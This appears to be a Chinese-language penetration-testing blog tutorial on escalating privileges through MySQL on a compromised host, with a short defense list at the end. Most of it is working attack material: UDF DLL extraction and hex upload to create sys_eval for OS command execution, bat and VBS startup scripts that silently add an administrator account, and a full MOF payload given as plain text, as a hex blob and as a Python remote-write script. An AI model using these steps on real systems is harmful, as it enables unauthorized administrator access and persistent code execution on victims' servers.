内网渗透-MySQL提权

发布于:2025-04-07 ⋅ 阅读:(33) ⋅ 点赞:(0)

MySQL提权

mysql的权限提升通常有两种:

UDF提权(常用)
写文件提权
    启动项提权
    mof提权

一、UDF提权
UDF

全称为user defined function,用户自定义函数

用户可以添加自定义的新函数到Mysql中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数
UDF提权的作用

渗透过程中,拿下一台低权限的主机shell(尤其是windows)时,有些操作无法进行,而此时本地恰好存在mysql数据库,且mysql是root权限 (windows中mysql一般都是管理员权限),就可以通过新建管理员用户等操作实现提权即udf提权,也可以称为通过mysql获得管理员权限
动态链接库

动态链接库:是把程序代码中会使用的函数编译成机器码,保存在.dll文件中。在编译时,不会把函数的机器码复制一份到可执行文件中。编译器只会在.exe的执行文件里,说明所要调用的函数放在哪一个*.dll文件。程序执行使用到这些函数时,操作系统会把dll文件中的函数拿出来给执行文件使用

注:在linux中对应为so文件
利用条件以及数据库版本问题

获得一个mysql数据库账号(最好是root),拥有insert、delete权限,拥有将xxx.dll写入相对应目录的权限

查看版本:

select version();

查看secure-file-priv是否有目录限制,执行:

show global variables like “secure%”;

当secure_file_priv 的值为 NULL ,表示限制mysqld 不允许导入|导出,无法进行提权
当secure_file_priv 的值为 c:/ ,表示限制 mysqld 的导入|导出只能发生在c盘目录下,无法进行提权
当 secure_file_priv的值没有具体值时,表示不对 mysqld 的导入|导出做限制,可以提权

查看plugin目录是否存在:

select @@plugin_dir;
#或
show variables like ‘plugin%’;

udf利用的其中一步,是要将我们的xxx.dll文件上传到mysql检索目录中,mysql各版本的检索目录有所不同:
版本 路径
MySQL < 5.0 导出路径随意
5.0 <= MySQL < 5.1 需要导出至目标服务器的系统目录(如:C:\windows\system32\)
5.1 < MySQL 必须导出到MySQL安装目录下的lib\plugin目录下(高版本mysql默认不存在lib\plugin目录,需要自己创建)

版本大于5.1的时候,lib\plugin文件夹的创建方法:

select @@basedir;
#查找到mysql的目录

select ‘It is dll’ into dumpfile ‘C:\Program Files\MySQL\MySQL Server 5.1\lib::$INDEX_ALLOCATION’;
#利用NTFS ADS创建lib目录

select ‘It is dll’ into dumpfile ‘C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin::$INDEX_ALLOCATION’;
#利用NTFS ADS创建plugin目录

udf文件的获取与上传

很多现成的udf文件,不需要自己构造:

从sqlmap中获取
sqlmap中的udf文件为了防止误杀进行了异或处理,需要利用sqlmap自带的解码脚本

python  /usr/share/sqlmap/extra/cloak/cloak.py -d -i  /usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_  -o lib_mysqludf_sys.dll
#win

python  /usr/share/sqlmap/extra/cloak/cloak.py -d -i  /usr/share/sqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so_  -o lib_mysqludf_sys.so
#linux

从msf中获取

/usr/share/metasploit-framework/data/exploits/mysql,直接cp出来就可以,不需要解码

使用MSF中的exploit/multi/mysql/mysql_udf_payload模块也可以进行UDF提权,MSF会将dll写入lib\plugin\目录下(前提是目录存在,如果目录不存在,则不能成功),DLL文件可以取任意的名字,该dll文件包含sys_exec()和sys_eval()两个函数.但是默认只创建sys_exec()函数,该函数执行并不会有回显,我们可以手工创建sys_eval()函数,来执行有回显的命令

国光师傅的博客:https://www.sqlsec.com/udf/

得到udf文件后,可利用webshell上传或者hex编码上传(这里只是举例,实际上,上传的方式有很多,步骤多变,应当视情况而定):

创建一张临时表用来存放DLL/SO文件的十六进制内容

CREATE TABLE temp_udf(udf blob);

插入

转化成十六进制方法很多这里我们使用mysql

select hex(load_file(‘C:/udf,dll’)) into dumpfile ‘c:/udf.txt’;

注:outfile导出文件会在末尾写入新行且转义换行符,破坏二进制文件结构,dumpfile不会进行任何操作

插入

其中 b i n a r y C o d e 为已经转换好的十六进制内容 , binaryCode为已经转换好的十六进制内容, binaryCode为已经转换好的十六进制内容,binarycode前加0X

INSERT into temp_udf values (CONVERT($binaryCode,CHRA));

导出

将udf文件导出至对应位置:

SELECT * FROM temp_udf INTO DUMPFILE "/usr/lib64/mysql/plugins/udf.so";

注:此时如果出现了错误Can't create/write to file是因为没有lib/plugin目录into dumpfile也不能创建文件夹所以报错

使用udf.dll

udf常用函数:

sys_eval,执行任意命令,并将输出返回。

sys_exec,执行任意命令,并将退出码返回。

sys_get,获取一个环境变量。

sys_set,创建或修改一个环境变量。

假设我的udf文件名为‘udf.dll’,且已经上传到了mysql检索目录中,接下来只需要引入即可

实例

CREATE FUNCTION sys_eval RETURNS STRING SONAME ‘udf.dll’;

只有两个变量,一个是function_name(函数名),我们想引入的函数是sys_eval。还有一个变量是shared_library_name(共享包名称),即‘xxx.dll’。

可以查看是否添加成功:

select * from mysql.func;

至此便成功引入了sys_eval函数,用于在mysql中执行系统命令:

select sys_eval(‘whoami’);

如果要卸载该函数:

drop function sys_eval;

实操

了解基本原理和流程后,接下来用实际操作熟悉一下具体的利用手法

vulnhub-Raven:2:具体操作见我另一篇文章:vulnhub-Raven:2 渗透记录

二、写文件提权

写文件提权针对于windows系统,基本上就是使用MySQL的outfile或dumpfile函数,向windows特定目录中写入文件来以被动的方式提权,所以这样提权的前提是secure_file_priv变量设置为空
1.启动项提权
原理

windows开机时候都会有一些开机启动的程序,用户启动项会以当前登录用户的权限运行,利用这点,我们可以将自动化脚本写入启动项,达到提权的目的

MySQL的启动项提权,原理就是通过mysql把一段bat或vbs脚本导入到系统的启动项文件夹中,如果管理员启动或者重启的服务器,那么该脚本就会被调用,并执行脚本里面的命令(创建管理员账户),实现权限提升
上传脚本

getshell后,查看服务器上系统盘的可读可写目录,若是启动目录 “C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” 是可读可写的,我们就可以执行上传一个vbs或者bat的脚本:

bat执行的基础命令:

@echo off
net user test1 Q!w2e3r4 /add
net localgroup administrators test1 /add

vbs执行的基础命令:

set wshshell=createobject("wscript.shell")
a=wshshell.run("cmd.exe /c net user ttt Q!w2e3r4 /add",0)
b=wshshell.run("cmd.exe /c net localgroup administrators ttt /add",0)


set wsnetwork=CreateObject("WSCRIPT.NETWORK") 
os="WinNT://"&wsnetwork.ComputerName 
Set ob=GetObject(os) '得到adsi接口,绑定 
Set oe=GetObject(os&"/Administrators,group") '属性,admin组 
Set od=ob.Create("user","test1") '建立用户 
od.SetPassword "Q!w2e3r4" '设置密码 
od.SetInfo '保存 
Set of=GetObject(os&"/test1",user) '得到用户 
oe.add os&"/test1"

上面脚本作用是:

创建一个用户名为 test1、密码为 Q!w2e3r4 的用户帐户
将该用户帐户添加到本地管理员组,赋予该用户管理员权限

值得一提的是:bat脚本在启动运行时会有明显的DOS窗口弹出来,而VBS脚本则可以完全隐藏窗口且不会有错误提示,也可以写一句完成脚本后自动删除此脚本的语句
写入启动项

上传后直接mysql语句写入即可:

连接到对方MYSQL 服务器

进入test数据库,这个数据库一般情况下没有表

直接写:

select load_file(“C:/www/vbs.txt”) into dumpfile “C:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/test.bat”;

接下来只要服务器重启,即可提权成功(通常我们会主动去重启服务器,利用远程溢出(Ms12-020)或社工手法等)
2.MOF提权
MOF

托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在windows 2003及更低版本windows中,nullevt.mof文件存储在c:/windows/system32/wbem/mof/目录下,windows系统每隔五秒就会以system权限执行一次该文件,去监控进程创建和死亡,执行成功会移动到该目录下的good文件夹,执行失败移动到bad文件夹
原理

对mof文件进行利用,修改此文件,将其中一部份vbs代码替换为后门代码或添加管理员用户的命令后,使用dumpfile函数导入c:/windows/system32/wbem/mof/文件夹,系统再次执行该文件即可完成权限提升
利用条件

mof提权需要在system32文件夹下写文件,条件较为严苛:

windows 2003及以下版本

mysql启动身份具有权限去读写c:/windows/system32/wbem/mof目录

secure_file_priv参数不为null

利用

添加管理员用户的vbs脚本如下:

#pragma namespace("\\\\.\\root\\subscription") 
instance of __EventFilter as $EventFilter 
{ 
    EventNamespace = "Root\\Cimv2"; 
    Name  = "filtP2"; 
    Query = "Select * From __InstanceModificationEvent " 
            "Where TargetInstance Isa \"Win32_LocalTime\" " 
            "And TargetInstance.Second = 5"; 
    QueryLanguage = "WQL"; 
}; 
instance of ActiveScriptEventConsumer as $Consumer 
{ 
    Name = "consPCSV2"; 
    ScriptingEngine = "JScript"; 
    ScriptText = 
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user Yuy0ung admin123 /add\")"; 
}; 
instance of __FilterToConsumerBinding 
{ 
    Consumer   = $Consumer; 
    Filter = $EventFilter; 
};

在添加用户之后,还需要将用户加入本地管理员组,将脚本中的net.exe user Yuy0ung admin123 /add\换成:

net localgroup Administrators Yuy0ung /add

脚本文件的上传思路与udf提权类似,大概三种:

直接上传然后dumpfile

select load_file(“C:/test.mof”) into dumpfile “c:/windows/system32/wbem/mof/nullevt.mof”

直接将脚本的16进制编码dumpfile

select 0x23707261676d61206e616d65737061636528225c5c5c5c2e5c5c726f6f745c5c737562736372697074696f6e2229200a696e7374616e6365206f66205f5f4576656e7446696c74657220617320244576656e7446696c746572200a7b200a202020204576656e744e616d657370616365203d2022526f6f745c5c43696d7632223b200a202020204e616d6520203d202266696c745032223b200a202020205175657279203d202253656c656374202a2046726f6d205f5f496e7374616e63654d6f64696669636174696f6e4576656e742022200a20202020202020202020202022576865726520546172676574496e7374616e636520497361205c2257696e33325f4c6f63616c54696d655c222022200a20202020202020202020202022416e6420546172676574496e7374616e63652e5365636f6e64203d2035223b200a2020202051756572794c616e6775616765203d202257514c223b200a7d3b200a0a696e7374616e6365206f66204163746976655363726970744576656e74436f6e73756d65722061732024436f6e73756d6572200a7b200a202020204e616d65203d2022636f6e735043535632223b200a20202020536372697074696e67456e67696e65203d20224a536372697074223b200a2020202053637269707454657874203d200a202020202276617220575348203d206e657720416374697665584f626a656374285c22575363726970742e5368656c6c5c22295c6e5753482e72756e285c226e65742e65786520757365722061646d696e2061646d696e202f6164645c2229223b200a7d3b200a0a696e7374616e6365206f66205f5f46696c746572546f436f6e73756d657242696e64696e67200a7b200a20202020436f6e73756d65722020203d2024436f6e73756d65723b200a2020202046696c746572203d20244576656e7446696c7465723b200a7d3b into dumpfile 'C:/windows/system32/wbem/mof/nullevt.mof';

数据库允许远程链接的情况下可以使用py写入

  #Python3

    import MySQLdb

    conn=MySQLdb.connect(host="192.168.111.6",user="root",passwd="root") 

    payload = r'''
    #pragma namespace("\\\\.\\root\\subscription")
    instance of __EventFilter as $EventFilter
     {
     EventNamespace = "Root\\Cimv2";
     Name = "filtP2";
     Query = "Select * From __InstanceModificationEvent "
     "Where TargetInstance Isa \"Win32_LocalTime\" "
     "And TargetInstance.Second = 5";
     QueryLanguage = "WQL";
     };

    instance of ActiveScriptEventConsumer as $Consumer
     {
     Name = "consPCSV2";
     ScriptingEngine = "JScript";
     ScriptText =
     "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user xxxx xxx /add\")";
     };

    instance of __FilterToConsumerBinding
     {
     Consumer = $Consumer;
     Filter = $EventFilter;
     };
    '''

    ascii_payload = ''

    for each_chr in payload:
        ascii_payload += str(ord(each_chr)) + ','

    ascii_payload = ascii_payload[:-1]

    cur = conn.cursor()
    sql = "select char(%s) into dumpfile 'C:/windows/system32/wbem/mof/nullevt.mof'" % ascii_payload

    cur.execute(sql)
    conn.close()

注意事项

服务器会每五秒会循环执行之前的mof文件中的内容,在服务器被mof提权后,需要解决系统继续运行恶意代码的问题:

net stop winmgmt
#停止winmgmt服务
rmdir /q /s c:\windows\system32\wbem\repository
#删除存储库备份
del /f /s c:\windows\system32\wbem\mof\good\nullevt.mof
#删除mof文件
net start winmgmt
#重启winmgmt服务

三、针对MySQL提权的防御手段

从上面提到的提权过程可以知道,这些权限提升基本都是mysql的配置不当导致的,因此,可以有如下防御措施:

降低数据库服务启动用户的权限
如果非必要,可以删除插件目录或限制插件目录的权限
正确配置secure_file_priv变量

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布